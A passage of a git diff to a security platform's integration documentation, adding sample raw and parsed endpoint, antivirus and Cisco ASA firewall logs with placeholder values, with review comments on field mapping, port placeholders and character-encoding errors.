"C:\\zabbix\\scripts\\sb.mssql.ps1", + "src.process.indicatorPostExploitationCount": 8, + "src.process.parent.activeContent.signedStatus": "unsigned", + "src.process.parent.pid": 3776 + } + ``` + + + === "dns_dnsresolved" 
@@ -326,6 +458,63 @@ In this section, you will find examples of raw logs as generated natively by the +=== "dns_macos" + + + ```json + { + "src.process.image.path": "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper", + "src.process.subsystem": "SUBSYSTEM_UNKNOWN", + "src.process.parent.isStorylineRoot": true, + "event.category": "dns", + "src.process.parent.integrityLevel": "INTEGRITY_LEVEL_UNKNOWN", + "src.process.parent.image.sha1": "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc", + "src.process.parent.storyline.id": "0A62D926-DFE7-4968-AA28-F0024BAC804D", + "src.process.isRedirectCmdProcessor": false, + "src.process.parent.publisher": "", + "src.process.parent.startTime": 1713167784335, + "endpoint.type": "laptop", + "endpoint.os": "osx", + "src.process.integrityLevel": "INTEGRITY_LEVEL_UNKNOWN", + "src.process.parent.displayName": "Google Chrome", + "src.process.name": "Google Chrome Helper", + "src.process.startTime": 1713167795818, + "agent.uuid": "75084C59-0F8A-479D-A9C4-2232C37D9D51", + "event.dns.response": "type: 5 edge-web-gew4.dual-gslb.spotify.com;2600:1901:1:4be::;", + "src.process.image.sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", + "src.process.user": "jdoe", + "timestamp": "2024-06-26T08:44:30.000Z", + "src.process.displayName": "Google Chrome Helper", + "endpoint.name": "MXY2XC6J7VJ", + "src.process.image.sha1": "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc", + "event.dns.request": "type: 28 gew4-spclient.spotify.com", + "src.process.isStorylineRoot": false, + "src.process.parent.image.path": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome", + "src.process.isNative64Bit": false, + "src.process.parent.sessionId": 0, + "src.process.uid": "CF37475F-BCA9-4F89-8A31-7B6C88CC6F1E", + "src.process.parent.image.md5": "68b329da9893e34099c7d8ad5cb9c940", + "src.process.parent.user": "psinha", + 
"src.process.pid": 1063, + "src.process.parent.name": "Google Chrome", + "src.process.cmdline": "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=network --shared-files --field-trial-handle=1718379636,r,10310964397040083203,6939088771020272477,262144 --variations-seed-version=20240412-130119.249000 --seatbelt-client=25", + "src.process.publisher": "", + "src.process.parent.isNative64Bit": false, + "src.process.parent.isRedirectCmdProcessor": false, + "src.process.image.md5": "68b329da9893e34099c7d8ad5cb9c940", + "src.process.storyline.id": "0A62D926-DFE7-4968-AA28-F0024BAC804D", + "event.type": "DNS Resolved", + "agent.version": "24.1.2.7444", + "src.process.signedStatus": "signed", + "src.process.parent.image.sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", + "src.process.parent.cmdline": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome", + "src.process.sessionId": 0, + "src.process.parent.pid": 790 + } + ``` + + + === "driver_driverload" 
@@ -851,6 +1040,122 @@ In this section, you will find examples of raw logs as generated natively by the +=== "fileoldpath" + + + ```json + { + "src.process.parent.isStorylineRoot": false, + "event.category": "file", + "src.process.parent.image.sha1": "0000000", + "site.id": "00000000", + "tgt.file.location": "Local", + "src.process.parent.displayName": "pparent", + "src.process.parent.subsystem": "SUBSYSTEM_UNKNOWN", + "src.process.indicatorRansomwareCount": 0, + "src.process.crossProcessDupRemoteProcessHandleCount": 0, + "src.process.tgtFileCreationCount": 1, + "src.process.indicatorInjectionCount": 0, + "src.process.moduleCount": 0, + "i.version": "preprocess-lib-1.0", + "src.process.parent.name": "pname", + "src.process.storyline.id": "00000-0000-0000-0000000", + "src.process.indicatorReconnaissanceCount": 0, + "src.process.childProcCount": 0, + "aaaa.url": "redacted.sentinelone.net", + "src.process.parent.eUserName": "aaaaaaaa", + "src.process.crossProcessOpenProcessCount": 0, + "src.process.eUserName": "aaaaaaaa", + "src.process.subsystem": "SUBSYSTEM_UNKNOWN", + "meta.event.name": "FILERENAME", + "src.process.parent.integrityLevel": "INTEGRITY_LEVEL_UNKNOWN", + "src.process.indicatorExploitationCount": 0, + "src.process.parent.storyline.id": "0000000-0000-0000-00000000", + "tgt.file.creationTime": 1722852662250, + "src.process.integrityLevel": "INTEGRITY_LEVEL_UNKNOWN", + "i.scheme": "edr", + "site.name": "sitename", + "src.process.netConnInCount": 0, + "event.time": 1722853381979, + "timestamp": "2024-08-05T10:23:01.979Z", + "account.id": "00000000000", + "dataSource.name": "SentinelOne", + "endpoint.name": "aaaaaaaaa", + "src.process.image.sha1": "aaaaaaaaaaaaaa", + "tgt.file.size": 750, + "src.process.isStorylineRoot": false, + "src.process.parent.image.path": "/bin/pparent", + "src.process.lUserName": "aaaaaaaa", + "dataSource.vendor": "SentinelOne", + "src.process.pid": 31304, + "tgt.file.isSigned": "unsigned", + "src.process.cmdline": " /usr/cmd -", + 
"dataSource.category": "security", + "src.process.crossProcessThreadCreateCount": 0, + "src.process.parent.isNative64Bit": false, + "src.process.parent.isRedirectCmdProcessor": false, + "src.process.parent.rUserUid": 1111, + "src.process.crossProcessCount": 0, + "src.process.signedStatus": "unsigned", + "event.id": "01J4H129Q4744MK0FX0CNXASK1_414", + "src.process.image.path": "/usr/path", + "src.process.tgtFileModificationCount": 2, + "src.process.indicatorEvasionCount": 0, + "src.process.netConnOutCount": 0, + "tgt.file.path": "/new/new/file/path/path", + "src.process.eUserUid": 1111, + "src.process.lUserUid": 1111, + "src.process.crossProcessDupThreadHandleCount": 0, + "endpoint.os": "linux", + "src.process.tgtFileDeletionCount": 0, + "src.process.startTime": 1722853381100, + "mgmt.id": "00000", + "os.name": "Linux", + "tgt.file.type": "UNKNOWN", + "src.process.displayName": "aaaaaaaaa", + "src.process.isNative64Bit": false, + "src.process.parent.sessionId": 0, + "src.process.rUserUid": 1111, + "src.process.uid": "000000000-0000-0000-00000000000", + "src.process.indicatorBootConfigurationUpdateCount": 0, + "src.process.indicatorInfostealerCount": 0, + "process.unique.key": "000000000-0000-0000-000000000", + "src.process.parent.eUserUid": 112, + "agent.version": "1", + "src.process.parent.uid": "000000000-0000-0000-0000000000000000", + "src.process.parent.rUserName": "aaaaaaaaa", + "src.process.sessionId": 0, + "src.process.netConnCount": 0, + "mgmt.osRevision": "Debian", + "group.id": "000000000-0000-0000-00000000", + "src.process.isRedirectCmdProcessor": false, + "src.process.parent.startTime": 1722853381090, + "src.process.dnsCount": 0, + "endpoint.type": "server", + "tgt.file.oldPath": "/old/path/name/tmp.aaaa", + "trace.id": "00000000000", + "src.process.rUserName": "aaaaaaaaa", + "src.process.name": "aaaaa", + "agent.uuid": "00000-0000-0000-000000", + "src.process.parent.lUserName": "aaaaaaaa", + "src.process.indicatorGeneralCount": 0, + 
"src.process.parent.lUserUid": 1111, + "src.process.crossProcessOutOfStorylineCount": 0, + "packet.id": "000000-0000-0000-000000000000", + "src.process.registryChangeCount": 0, + "src.process.indicatorPersistenceCount": 3, + "src.process.parent.signedStatus": "unsigned", + "tgt.file.id": "00000-0000-0000-0000000000", + "account.name": "account_name", + "event.type": "File Rename", + "task.path": "/var/aaa/aaa/aaaa/aaaa", + "src.process.indicatorPostExploitationCount": 0, + "src.process.parent.pid": 111111 + } + ``` + + + === "group_groupcreation" diff --git a/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8.md b/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8.md index 1f04601f91..fa3dcc4928 100644 --- a/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8.md +++ b/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_activity_logs.json" 
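Review bot: the `/docs/xdr/...` to `/xdr/...` substitution in this hunk is repeated verbatim further down for the 41e3ca4e, 44439212 and 44d41a2b pages; since all of these files live under `integrations/generated/`, the template that emits the "Transformed Events Samples after Ingestion" paragraph must carry the same change, or the next generation run reintroduces `/docs/`. Worth confirming in the same PR that the site serves `/xdr/features/detect/rules_catalog`, `/xdr/features/investigate/events` and `/xdr/features/detect/sigma` without the `/docs` prefix, so these are not three dead links per page.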
@@ -185,6 +185,66 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_control_ready_2.json" + + ```json + + { + "message": "HOSTNAME,1.2.3.4,Continue,Le contr\u00f4le des applications et des p\u00e9riph\u00e9riques est pr\u00eat.,Syst\u00e8me,Begin: 2022-10-19 06:45:39,End Time: 2022-10-19 06:45:39,Rule: R\u00e8gle int\u00e9gr\u00e9e,0,SysPlant,0,SysPlant,Aucun(e),User Name: Aucun(e),Domain Name: DOMAIN,Action Type: ,File size (bytes): 0,Device ID:", + "event": { + "action": "Continue", + "category": [ + "process" + ], + "end": "2022-10-19T06:45:39Z", + "reason": "Le contr\u00f4le des applications et des p\u00e9riph\u00e9riques est pr\u00eat.", + "start": "2022-10-19T06:45:39Z", + "type": [ + "info" + ] + }, + "@timestamp": "2022-10-19T06:45:39Z", + "broadcom": { + "endpoint_protection": { + "server": { + "domain": "DOMAIN" + } + } + }, + "file": { + "size": 0 + }, + "host": { + "hostname": "HOSTNAME", + "ip": "1.2.3.4", + "name": "HOSTNAME" + }, + "observer": { + "product": "Symantec Endpoint Protection", + "vendor": "Broadcom" + }, + "process": { + "executable": "SysPlant", + "name": "SysPlant", + "pid": 0 + }, + "related": { + "hosts": [ + "HOSTNAME" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + === "test_liveupdate.json" ```json 
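Review bot: the raw line carries `Rule: Règle intégrée` (built-in rule) and the notice `Le contrôle des applications et des périphériques est prêt.` (application and device control is ready), yet the transformed event keeps nothing of the rule name while emitting `process.pid: 0`, `process.name: "SysPlant"` and `file.size: 0` from the placeholder zeros in the line; for a status notice the rule name is the useful field, so map it (ECS `rule.name` fits) and consider dropping `process.pid` and `file.size` when the raw value is `0`. `event.category: ["process"]` with `event.type: ["info"]` is acceptable, and `event.action: "Continue"` is the SEP action column, which the field table could say explicitly.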
@@ -357,6 +417,92 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_malicious_scan_2.json" + + ```json + + { + "message": "VPNP02,Event Description: [SID: 32329] Audit: Malicious Scan Attempt 2 attaque d\u00e9tect\u00e9e mais pas bloqu\u00e9e. Chemin d\u2019application : SYSTEM,Event Type: ,Local Host IP: 1.2.3.4,Local Host MAC: 000000000000,Remote Host Name: ,Remote Host IP: 5.6.7.8,Remote Host MAC: 000000000000,Outbound,TCP,,Begin: 2022-10-19 08:26:56,End Time: 2022-10-19 08:26:56,Occurrences: 1,Application: SYSTEM,Location: Par d\u00e9faut,User Name: none,Domain Name: ,Local Port: 443,Remote Port: 23203,CIDS Signature ID: 32329,CIDS Signature string: Audit: Malicious Scan Attempt 2,CIDS Signature SubID: 65536,Intrusion URL: http://9.10.11.12:443/,Intrusion Payload URL: ,SHA-256: 0000000000000000000000000000000000000000000000000000000000000000,MD-5: ,Intensive Protection Level: N/A,URL Risk: N/A,URL Category: N/A", + "event": { + "category": [ + "intrusion_detection" + ], + "end": "2022-10-19T08:26:56Z", + "reason": "Audit: Malicious Scan Attempt 2 attaque d\u00e9tect\u00e9e mais pas bloqu\u00e9e. 
Chemin d\u2019application : SYSTEM", + "start": "2022-10-19T08:26:56Z", + "type": [ + "info" + ] + }, + "@timestamp": "2022-10-19T08:26:56Z", + "broadcom": { + "endpoint_protection": { + "application": { + "name": "SYSTEM" + }, + "cids": { + "signature": { + "id": 32329, + "label": "Audit: Malicious Scan Attempt 2", + "sub_id": 65536 + } + } + } + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 23203 + }, + "host": { + "hostname": "VPNP02", + "ip": "1.2.3.4", + "name": "VPNP02" + }, + "network": { + "direction": "outbound", + "transport": "tcp" + }, + "observer": { + "product": "Symantec Endpoint Protection", + "vendor": "Broadcom" + }, + "related": { + "hosts": [ + "VPNP02" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 443 + }, + "threat": { + "enrichments": [ + { + "indicator": { + "sightings": 1, + "type": "file" + } + } + ] + }, + "url": { + "domain": "9.10.11.12", + "original": "http://9.10.11.12:443/", + "path": "/", + "port": 443, + "scheme": "http" + } + } + + ``` + + === "test_scan.json" ```json 
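Review bot: the raw line has an all-zero `SHA-256` and an empty `MD-5`, yet the transformed event emits `threat.enrichments[0].indicator` with `type: "file"`, `sightings: 1` and no hash or any other indicator value; an indicator without a value is noise for anything keyed on `threat.enrichments`, so either build it only when the hash is non-zero or type it from what is actually present (the `Intrusion URL`, which did get mapped to `url.*`). The signature (`CIDS Signature ID: 32329`, `Audit: Malicious Scan Attempt 2`) lands only under `broadcom.endpoint_protection.cids.signature`; mapping it to ECS `rule.id` and `rule.name` as well would let vendor-agnostic IDS rules match. Also, `attaque détectée mais pas bloquée` means "attack detected but not blocked", so `event.type: ["allowed"]` would make the allowed-versus-blocked distinction searchable where `["info"]` does not.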
@@ -429,6 +575,77 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_scan2.json" + + ```json + + { + "message": "Scan ID: 1720651832,Begin: 2024-07-11 12:50:07,End Time: ,Started,Duration (seconds): 0,User1: jdoe,User2: ,Scan started on all drives and all extensions.,,Command: Not a command scan (),Threats: 0,Infected: 0,Total files: 0,Omitted: 0,Computer: DNFERO234,IP Address: 1.2.3.4,Domain Name: Par d\u00e9faut,Group Name: My Domain\\Region,Server Name: XXXXX001,Scan Type: Scheduled Scan", + "event": { + "category": [ + "malware" + ], + "reason": "Scan started on all drives and all extensions.", + "start": "2024-07-11T12:50:07Z", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-11T12:50:07Z", + "broadcom": { + "endpoint_protection": { + "scan": { + "command": "Not a command scan ()", + "duration": 0, + "id": "1720651832", + "result": { + "infections": 0, + "omitted": 0, + "threats": 0, + "total": 0 + }, + "status": "started", + "type": "Scheduled Scan" + }, + "server": { + "domain": "Par d\u00e9faut", + "group": "My Domain\\Region", + "name": "XXXXX001" + } + } + }, + "host": { + "hostname": "DNFERO234", + "ip": "1.2.3.4", + "name": "DNFERO234" + }, + "observer": { + "product": "Symantec Endpoint Protection", + "vendor": "Broadcom" + }, + "related": { + "hosts": [ + "DNFERO234" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + === "test_sonar.json" ```json diff --git a/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8_sample.md b/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8_sample.md index 9fa3d7979c..deb8a68628 100644 --- a/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8_sample.md 
+++ b/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8_sample.md @@ -28,6 +28,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_control_ready_2" + + ``` + HOSTNAME,1.2.3.4,Continue,Le contrĂŽle des applications et des pĂ©riphĂ©riques est prĂȘt.,SystĂšme,Begin: 2022-10-19 06:45:39,End Time: 2022-10-19 06:45:39,Rule: RĂšgle intĂ©grĂ©e,0,SysPlant,0,SysPlant,Aucun(e),User Name: Aucun(e),Domain Name: DOMAIN,Action Type: ,File size (bytes): 0,Device ID: + ``` + + + === "test_liveupdate" ``` @@ -52,6 +60,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_malicious_scan_2" + + ``` + VPNP02,Event Description: [SID: 32329] Audit: Malicious Scan Attempt 2 attaque dĂ©tectĂ©e mais pas bloquĂ©e. Chemin d’application : SYSTEM,Event Type: ,Local Host IP: 1.2.3.4,Local Host MAC: 000000000000,Remote Host Name: ,Remote Host IP: 5.6.7.8,Remote Host MAC: 000000000000,Outbound,TCP,,Begin: 2022-10-19 08:26:56,End Time: 2022-10-19 08:26:56,Occurrences: 1,Application: SYSTEM,Location: Par dĂ©faut,User Name: none,Domain Name: ,Local Port: 443,Remote Port: 23203,CIDS Signature ID: 32329,CIDS Signature string: Audit: Malicious Scan Attempt 2,CIDS Signature SubID: 65536,Intrusion URL: http://9.10.11.12:443/,Intrusion Payload URL: ,SHA-256: 0000000000000000000000000000000000000000000000000000000000000000,MD-5: ,Intensive Protection Level: N/A,URL Risk: N/A,URL Category: N/A + ``` + + + === "test_scan" ``` 
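Review bot: as rendered, the accented characters in these two raw samples are mojibake (`contrĂŽle`, `pĂ©riphĂ©riques`, `prĂȘt`, `SystĂšme`, `RĂšgle intĂ©grĂ©e`, `dĂ©tectĂ©e`, `bloquĂ©e`, `Par dĂ©faut`, and likewise `Par dĂ©faut` in the `test_scan2` raw sample below), whereas the transformed samples for the same events carry the correct code points (`contr\u00f4le`, `pr\u00eat`, `d\u00e9tect\u00e9e`); the raw text was written or read with a non-UTF-8 encoding somewhere between the test fixture and this generated page. Fix the encoding in the generator's read/write step rather than hand-editing the sample, otherwise every regenerated raw sample will come out the same way and the raw and transformed tabs will disagree about the message bytes.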
@@ -60,6 +76,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_scan2" + + ``` + Scan ID: 1720651832,Begin: 2024-07-11 12:50:07,End Time: ,Started,Duration (seconds): 0,User1: jdoe,User2: ,Scan started on all drives and all extensions.,,Command: Not a command scan (),Threats: 0,Infected: 0,Total files: 0,Omitted: 0,Computer: DNFERO234,IP Address: 1.2.3.4,Domain Name: Par dĂ©faut,Group Name: My Domain\Region,Server Name: XXXXX001,Scan Type: Scheduled Scan + ``` + + + === "test_sonar" ``` diff --git a/_shared_content/operations_center/integrations/generated/41e3ca4e-a714-41aa-ad69-684a0b3835fc.md b/_shared_content/operations_center/integrations/generated/41e3ca4e-a714-41aa-ad69-684a0b3835fc.md index 2b0a7ac51d..f4c44ba0b6 100644 --- a/_shared_content/operations_center/integrations/generated/41e3ca4e-a714-41aa-ad69-684a0b3835fc.md +++ b/_shared_content/operations_center/integrations/generated/41e3ca4e-a714-41aa-ad69-684a0b3835fc.md 
@@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "activity_log_archive_creation.json" diff --git a/_shared_content/operations_center/integrations/generated/44439212-c2d8-4645-ad60-8fd5e39140b3.md b/_shared_content/operations_center/integrations/generated/44439212-c2d8-4645-ad60-8fd5e39140b3.md index bf9245ab7d..275b9fbe3b 100644 --- a/_shared_content/operations_center/integrations/generated/44439212-c2d8-4645-ad60-8fd5e39140b3.md +++ b/_shared_content/operations_center/integrations/generated/44439212-c2d8-4645-ad60-8fd5e39140b3.md 
@@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "2sv_disable.json" diff --git a/_shared_content/operations_center/integrations/generated/44d41a2b-96cb-4d37-84e0-4f0c0f9138b8.md b/_shared_content/operations_center/integrations/generated/44d41a2b-96cb-4d37-84e0-4f0c0f9138b8.md index 1f6b528202..6a049492d4 100644 --- a/_shared_content/operations_center/integrations/generated/44d41a2b-96cb-4d37-84e0-4f0c0f9138b8.md +++ b/_shared_content/operations_center/integrations/generated/44d41a2b-96cb-4d37-84e0-4f0c0f9138b8.md 
@@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "alert_certificate.json" diff --git a/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf.md b/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf.md index 0217a741c1..eeb2943ce3 100644 --- a/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf.md +++ b/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf.md 
@@ -29,7 +29,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_106001.json" @@ -782,9 +782,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "target": "network-traffic" }, "destination": { - "address": "47.241.116.84", - "ip": "47.241.116.84", - "port": 10800 + "address": "10.11.0.2", + "ip": "10.11.0.2", + "port": 0 }, "network": { "direction": "inbound", @@ -801,8 +801,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "source": { - "address": "10.11.0.2", - "ip": "10.11.0.2" + "address": "47.241.116.84", + "ip": "47.241.116.84", + "port": 10800 } } 
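Review bot: the two hunks at lines 782 and 801 swap `source` and `destination` for an event that is still tagged `network.direction: inbound` (47.241.116.84 with port 10800 moves from destination to source, 10.11.0.2 becomes the destination). That is a breaking change for any saved query or custom rule keyed on `destination.ip` or `destination.port` for this intake, so it should be called out in the parser changelog and the reason for the flip (which address in the raw message is the foreign address) stated in the test file, since the raw line that justifies the new mapping is not shown here.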
@@ -832,9 +833,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "destination": { - "address": "1.2.3.4", - "ip": "1.2.3.4", - "port": 1 + "address": "1.2.3.5", + "ip": "1.2.3.5", + "port": 0 }, "network": { "direction": "inbound", @@ -854,8 +855,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "source": { - "address": "1.2.3.5", - "ip": "1.2.3.5" + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 1 }, "user": { "domain": "LOCAL", @@ -883,9 +885,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "target": "network-traffic" }, "destination": { - "address": "172.16.10.208", - "ip": "172.16.10.208", - "port": 2189 + "address": "172.16.19.90", + "ip": "172.16.19.90", + "port": 0 }, "network": { "transport": "icmp" @@ -904,8 +906,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "source": { - "address": "172.16.19.90", - "ip": "172.16.19.90" + "address": "172.16.10.208", + "ip": "172.16.10.208", + "port": 2189 }, "user": { "name": "karibou" 
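Review bot: in each of the three hunks here the side that lost its real port now carries `"port": 0` (for example `"address": "1.2.3.5", "ip": "1.2.3.5", "port": 0`). A literal port 0 is a placeholder from the `/0` in the ASA message, not an observed port, and storing it makes `destination.port` look populated to rules and aggregations; consider leaving the field unset when the message gives `/0` rather than emitting `0`, and at least apply the same convention to every 302xxx sample.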
@@ -938,11 +941,62 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "destination": { + "address": "1.2.4.3", + "ip": "1.2.4.3", + "port": 0 + }, + "network": { + "transport": "icmp" + }, + "observer": { + "product": "Adaptive Security Appliance", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "1.2.3.4", + "1.2.4.3" + ] + }, + "source": { "address": "1.2.3.4", "ip": "1.2.3.4", "port": 25481 + } + } + + ``` + + +=== "test_ASA_302021_3.json" + + ```json + + { + "message": "%ASA-6-302020: Built inbound ICMP connection for faddr 1.2.3.4/14 gaddr 172.1.1.1/0 laddr 172.1.1.2/0 type 8 code 0", + "event": { + "category": [ + "network" + ], + "code": "302020" + }, + "action": { + "name": "built", + "target": "network-traffic" + }, + "cisco": { + "ftd": { + "icmp_code": "0", + "icmp_type": "8" + } + }, + "destination": { + "address": "172.1.1.2", + "ip": "172.1.1.2", + "port": 0 }, "network": { + "direction": "inbound", "transport": "icmp" }, "observer": { 
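Review bot: the new sample is named `test_ASA_302021_3.json` but its message and `event.code` are `302020` (Built inbound ICMP connection), so the name does not match the event it tests; rename it `test_ASA_302020_*.json` so the 302020 coverage is findable. In the same sample the message is an ICMP echo (`type 8 code 0`) and ICMP has no transport ports, so mapping the `/14` after `faddr` to `source.port` (visible in the following hunk) mislabels the ICMP identifier as a port; either drop it or store it under the `cisco.ftd` namespace next to `icmp_type` and `icmp_code`.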
@@ -952,12 +1006,63 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "ip": [ "1.2.3.4", - "1.2.4.3" + "172.1.1.2" ] }, "source": { - "address": "1.2.4.3", - "ip": "1.2.4.3" + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 14 + } + } + + ``` + + +=== "test_ASA_302021_4.json" + + ```json + + { + "message": "%ASA-6-302021: Teardown ICMP connection for faddr 1.2.3.4/14 gaddr 172.1.1.1/0 laddr 172.1.1.2/0 type 8 code 0", + "event": { + "category": [ + "network" + ], + "code": "302021" + }, + "action": { + "name": "teardown", + "target": "network-traffic" + }, + "cisco": { + "ftd": { + "icmp_code": "0", + "icmp_type": "8" + } + }, + "destination": { + "address": "172.1.1.2", + "ip": "172.1.1.2", + "port": 0 + }, + "network": { + "transport": "icmp" + }, + "observer": { + "product": "Adaptive Security Appliance", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "1.2.3.4", + "172.1.1.2" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 14 } } diff --git a/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf_sample.md b/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf_sample.md index 07a5efd2cf..4dc67469a3 100644 --- a/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf_sample.md +++ b/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf_sample.md @@ -156,6 +156,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_ASA_302021_3" + + ``` + %ASA-6-302020: Built inbound ICMP connection for faddr 1.2.3.4/14 gaddr 172.1.1.1/0 laddr 172.1.1.2/0 type 8 code 0 + ``` + + + +=== "test_ASA_302021_4" + + ``` + %ASA-6-302021: Teardown ICMP connection for faddr 1.2.3.4/14 gaddr 172.1.1.1/0 laddr 172.1.1.2/0 type 8 code 0 + ``` + + + === "test_ASA_305011" ``` 
